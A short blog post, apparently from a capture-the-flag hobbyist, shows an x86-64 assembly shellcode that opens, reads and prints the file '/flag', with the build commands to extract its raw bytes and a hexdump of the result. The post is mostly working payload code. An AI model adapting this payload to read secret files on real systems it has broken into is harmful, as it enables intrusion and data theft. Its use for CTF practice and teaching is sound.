Best way to get your raw shellcode

Dec. 10, 2020 // echel0n

Hello fellas! If you're wondering how to compile your payload and get raw shellcode in seconds, you can try this.

  1. .global _start
  2. _start:
  3. .intel_syntax noprefix
  4. push [rip + 0x28]
  5. push rsp
  6. pop rdi
  7. push 0
  8. pop rsi # SET O_RDONLY FILE OPEN MODE
  9. push 2
  10. pop rax # syscall open()
  11. syscall
  12. # read(int fd, void *buf, size_t count)
  13. push rax # rax has fd num
  14. pop rdi # rax onto rdi
  15. push rsp
  16. pop rsi
  17. push 150
  18. pop rdx # set bufferlen=150
  19. push 0
  20. pop rax # set rax = 0 syscall for read()
  21. syscall
  22. # write(int fd, void *buf, size_t count)
  23. push rsp
  24. pop rsi
  25. push 1 # syscal write()
  26. pop rax # set write() syscall
  27. push 1
  28. pop rdi # fd 0 TO STDOUT
  29. syscall
  30. # exit()
  31. push 60
  32. pop rax # syscall for exit()
  33. syscall
  34. flagstring:
  35. .string "\x2f\x66\x6c\x61\x67\x00"
  1. $ gcc -nostdlib -static shellcode.asm -o shellcode-elf
  2. $ objcopy --dump-section .text=shellcode-raw shellcode-elf

Congrats! You've just compiled your shellcode and copied raw payload to ./shellcode-raw file. Let's verify this.

  1. 00000000: ff34 252f 1040 0054 5f6a 005e 6a02 580f .4%/.@.T_j.^j.X.
  2. 00000010: 0550 5f54 5e68 9600 0000 5a6a 0058 0f05 .P_T^h....Zj.X..
  3. 00000020: 545e 6a01 586a 015f 0f05 6a3c 580f 052f T^j.Xj._..j<X../
  4. 00000030: 666c 6167 0000 flag..

Have a nice day!